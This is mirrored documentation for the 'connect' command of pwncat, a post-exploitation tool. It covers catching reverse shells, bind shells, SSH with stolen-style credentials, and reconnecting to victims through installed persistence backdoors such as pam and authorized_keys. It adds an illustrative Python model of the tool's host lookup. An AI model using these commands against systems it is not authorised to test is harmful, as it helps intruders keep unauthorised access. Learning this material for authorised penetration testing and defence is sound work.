mirror of https://github.com/calebstewart/pwncat.git
synced 2024-12-04 06:13:45 +01:00

Connect
=======

The ``connect`` command is used to connect to a remote victim. It can be used to catch a reverse shell, open a bind
shell, utilize legitimate SSH credentials, or reconnect via a previously installed persistence method to a known host.

This command is also the command which is run if you pass arguments to the external ``pwncat`` script. All arguments
to ``pwncat`` are passed directly to the ``connect`` command at startup. If no connection is made during this command,
``pwncat`` will automatically exit after command completion.

The ``connect`` command is only accessible prior to an active connection. If you attempt to run this command after a
connection has been established, it will not attempt a new connection and will not load your configuration script.
Because the ``pwncat`` prompt is only accessible after a connection, this command is effectively only useful
when used as the arguments to the main ``pwncat`` application or in configuration scripts. Replacing ``connect``
with ``pwncat`` in any of the examples below will work the same way at startup.

Catching a Reverse Shell
------------------------

Reverse shell listeners are started with the ``--listen`` parameter. This mode requires the ``--port`` parameter; the
``--host`` parameter is optional and, if not specified, is assumed to be ``0.0.0.0`` to bind to all interfaces. Keep in
mind that binding to ``0.0.0.0`` exposes the listener on every interface of your machine, so on a multi-homed host you
may prefer to bind only to the address the victim will call back to. To listen for incoming shell connections on port
4444, you could issue a command like:

.. code-block:: bash

    connect -l -H 0.0.0.0 -p 4444

Connecting to a Bind Shell
--------------------------

Making an outbound connection to a bind shell is accomplished through the ``--connect`` parameter. This mode requires
both the ``--host`` and ``--port`` parameters to be specified.

.. code-block:: bash

    connect -c -H 1.1.1.1 -p 4444

Connecting to an SSH Server
---------------------------

If you have valid credentials to a remote SSH server, but would like to utilize ``pwncat`` to manage your session, you
can use the ``--ssh`` option. This mode requires the ``--host`` and ``--user`` options; ``--port`` is optional and
defaults to ``22``. Along with these options, you must specify either a ``--password`` or ``--identity``
for the remote password or private key identity file respectively. ``pwncat`` will use Paramiko to connect to the
victim and establish a PTY shell. It will then act normally and provide you access to this shell. All normal ``pwncat``
features are still available over the SSH transport!

Keep in mind that a password given on the command line ends up in your shell history and is visible to other users of
your attacking machine in the process list, so prefer ``--identity`` or put the ``connect`` line in a configuration
script where you can.

.. code-block:: bash
    :caption: Connecting with a known password

    connect -s -H 1.1.1.1 -u root -p "P@ssw0rd"

.. code-block:: bash
    :caption: Connecting with a known private key

    connect -s -H 1.1.1.1 -u root -i "./exfiled-privkey"

Listing Known Persistence Methods
---------------------------------

The ``connect`` command has the ability to query the database for all known remote hosts and list installed persistence
methods. It also provides the ability to leverage installed persistence methods to reconnect to a specific host. This
allows you to easily re-establish your session after disconnection if you installed some form of persistence.

In ``pwncat`` hosts are identified by a "host hash". This hash is generated by combining some unique data taken from the
remote host the last time a session was established and should be unique across all hosts (unlike IP addresses). The
ideal way to reference a remote host is by its host hash. With an open session, you can retrieve your host hash with
the ``sysinfo`` command. To retrieve known hosts with persistence methods after disconnection, you can use the
``--list`` option to the ``connect`` command:

.. code-block:: bash
    :caption: Retrieving a list of known hosts

    $ pwncat -C data/pwncatrc --list
    1.1.1.1 - debian - d87b9646813d250ac433decdee70112a
      - pam as system
      - authorized_keys as debian

When reconnecting to a host, you will need either the host hash or the IP address. While the host hash is preferred,
``pwncat`` will look up a host by IP address in the database. In cases where multiple hosts are NAT'd behind a single
IP address, ``pwncat`` will choose the first host from the database with a matching IP address, which may not be the
one you intended; use the host hash whenever more than one victim shares an address.

Reconnecting to a Victim
------------------------

Once you have your victim's IP address or host hash, you are ready to reconnect. Reconnecting is simple and automatic in
most cases. The simplest option is to supply the victim IP or host hash to the ``--host`` parameter and specify the
``--reconnect`` option. This will try each persistence method individually until one yields a session:

.. code-block:: bash

    $ pwncat -C data/pwncatrc -r -H d87b9646813d250ac433decdee70112a
    [+] setting terminal prompt
    [+] running in /bin/bash
    [+] terminal state synchronized
    [+] pwncat is ready 🐈

    (remote) debian@debian-s-1vcpu-1gb-nyc1-01:~$

If you have installed multiple persistence methods for multiple users, you can also specify a persistence method or user
to connect with. If only one of ``--method`` or ``--user`` is specified, all methods matching your search will be tried.
For example, specifying only ``--method`` will cause ``pwncat`` to attempt each user for which that method is installed.
On the other hand, specifying only ``--user`` will cause ``pwncat`` to attempt connection with every method which
offers persistence as that user. When both are specified, only the exact matching persistence method will be attempted.

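The host lookup rules from the previous section and the ``--method``/``--user`` filtering rules just described are small
enough to model in a few functions. The Python below is an added example, not pwncat's code: ``find_host`` resolves a
``--host`` value (hash first, then first IP match, which is where the NAT ambiguity comes from), ``candidate_methods``
applies the three filter cases, and ``reconnect`` walks the candidates until an injected ``attempt`` callback reports a
session. The ``KnownHost`` layout, every record in ``KNOWN_HOSTS`` (the two hashes other than the one printed on this
page are made up) and the ``attempt`` stub are assumptions for the example; pwncat's real schema and the inputs to its
host hash are not shown on this page and are not reproduced here.

```python
"""Added example (not pwncat's own code): how ``connect --reconnect``
resolves ``--host`` and which persistence entries it tries, modelled on the
rules in the text. The database layout and every record in it are
constructed for the example."""
from dataclasses import dataclass


@dataclass
class KnownHost:
    ip: str
    hostname: str
    host_hash: str
    persistence: list  # (method, user) pairs, in the order they were stored


# Constructed sample database. The first two records share an IP address,
# as two victims NAT'd behind one public address would.
KNOWN_HOSTS = [
    KnownHost("1.1.1.1", "debian", "d87b9646813d250ac433decdee70112a",
              [("pam", "system"), ("authorized_keys", "debian")]),
    KnownHost("1.1.1.1", "web01", "3c1f2a9b8e7d6c5b4a3f2e1d0c9b8a7f",  # made-up hash
              [("authorized_keys", "root")]),
    KnownHost("10.0.0.7", "centos", "9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b",  # made-up hash
              [("authorized_keys", "root"), ("pam", "system")]),
]


def find_host(db, target):
    """Resolve a ``--host`` value. A host hash is authoritative; an IP
    address falls back to the *first* stored record with that address,
    which is the ambiguity the text warns about behind NAT."""
    for host in db:
        if host.host_hash == target:
            return host
    for host in db:
        if host.ip == target:
            return host
    return None


def candidate_methods(host, method=None, user=None):
    """Persistence entries to try for one host, filtered by ``--method``
    and/or ``--user``: no filter tries everything, one filter tries every
    entry matching it, both filters narrow to the exact entry."""
    return [(m, u) for (m, u) in host.persistence
            if (method is None or m == method) and (user is None or u == user)]


def reconnect(db, target, attempt, method=None, user=None):
    """Try each candidate in order and return the first (method, user) that
    ``attempt`` reports as a live session, or None. ``attempt`` stands in
    for the real reconnection and is injected so this runs offline."""
    host = find_host(db, target)
    if host is None:
        return None
    for entry in candidate_methods(host, method, user):
        if attempt(host, *entry):
            return entry
    return None


def format_list(db):
    """Render the database the way the ``connect --list`` output on the page reads."""
    lines = []
    for host in db:
        lines.append(f"{host.ip} - {host.hostname} - {host.host_hash}")
        lines.extend(f"  - {m} as {u}" for (m, u) in host.persistence)
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_list(KNOWN_HOSTS))
    # Pretend the pam backdoor was cleaned up: only authorized_keys still works.
    alive = lambda host, m, u: m == "authorized_keys"
    print(reconnect(KNOWN_HOSTS, "d87b9646813d250ac433decdee70112a", alive))
    # By IP, "1.1.1.1" resolves to "debian", so root persistence on web01 is never tried.
    print(reconnect(KNOWN_HOSTS, "1.1.1.1", alive, user="root"))
```

The last call in the ``__main__`` block is the NAT trap in miniature: the request names a user that only exists on the
second host behind ``1.1.1.1``, but the IP resolves to the first record, so nothing is tried and the reconnect fails.
Addressing the host by its hash avoids that.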
Automated Connection w/ Configuration Script
--------------------------------------------

Configuration scripts are expected to be used on an engagement basis. If you have made a connection to a victim and have
installed persistence methods, you can add your connect command to your configuration script in order to simplify
connection in the future. For example, if you have made a previous connection to the host ``1.1.1.1`` and would like
``pwncat`` to automatically reconnect to that host on startup, you could create a configuration script:

.. code-block:: bash
    :caption: pwncatrc - configuration script

    # Ensure pwncat knows about your database
    set db "sqlite:///engagement.sqlite"

    # Automatically attempt reconnection to your host via authorized_keys
    # as the root user
    connect --reconnect --host 1.1.1.1 -m authorized_keys -u root

With this script, ``pwncat`` will attempt to connect to the specified host without any other parameters. This simplifies
the ``pwncat`` command if you intend to connect/reconnect multiple times.

.. code-block:: bash
    :caption: Simplified Reconnection w/ Configuration Script

    $ pwncat -C data/pwncatrc
    [+] setting terminal prompt
    [+] running in /usr/bin/bash
    [+] terminal state synchronized
    [+] pwncat is ready 🐈

    (remote) root@pwncat-centos-testing:~#